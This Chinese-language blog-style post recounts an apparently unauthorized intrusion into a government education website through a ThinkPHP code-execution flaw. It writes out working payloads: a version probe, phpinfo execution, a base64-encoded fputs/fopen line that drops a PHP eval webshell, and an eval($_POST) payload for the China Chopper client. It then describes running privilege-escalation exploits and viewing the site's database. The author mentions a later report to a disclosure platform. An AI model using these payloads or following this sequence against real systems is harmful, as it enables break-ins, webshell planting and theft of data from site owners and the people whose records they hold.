这个很早就写了,没有修复就没有发出来。警察叔叔会找我,不过现在已经提交第三方平台修复了。
目标是:http://zsjh...du.gov.cn/index.php/Login
根据url,猜测可能是thinkphp框架。
随便在url后输入字符,发现
但是由于代码审计的实力有限,无法挖掘如此强大的新的通杀漏洞,尝试用之前的一波老漏洞~~
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件
查看版本:
module/action/param1/${@print(THINK_VERSION)}
就是说,print( )里面可以执行我们的任意代码。如phpinfo()等其他函数:module/action/param1/${@phpinfo()}
我们可以直接利用fputs和fopen函数直接写木马出来了,构造语句:
fputs(fopen(base64_decode(“dmFmLnBocA==”),”w”),base64_decode(“PD9ldmFsKCRfUE9TVFtzdW5ueWdpcmxdKTs/Pg==”))
base64_decode(“dmFmLnBocA==”)解码后是 vaf.php
base64_decode(“PD9ldmFsKCRfUE9TVFtzdW5ueWdpcmxdKTs/Pg==”)解码后是 <?eval($_POST[sunnygirl]);?>
只要执行了 就能在该目录下生成一个vaf.php的一句话木马文件
但是操作的时候出现了问题
双引号被转义,然后我试了其他几种不用双引号写马的代码,都失败了
原因是 <> 尖括号等都被转义了 而exec()等系统命令执行函数写马的话是写不出的
但是中国人有菜刀啊~~
http://******/index.php/module/action/param1/${@print(eval($_POST[c]))}
whomai查看权限,uname –r查看内核版本
测试还发现存在GCC,简直爱它
在公司没有exp提权也是一种病… 然后我用了一个perl脚本全自动化查询exp。
挑了几个编译执行,失败。
不继续了~
看看泄漏的数据库,赶紧退出,敏感的东西,不想被网警叔叔查水表~
感谢cc表哥的提点和珍藏的exp。(你们猜我有没有提权成功)
亮点在提权上,可是发现没有截图,已经修复了。
估计某教育厅直接关了网站转到内网了~~
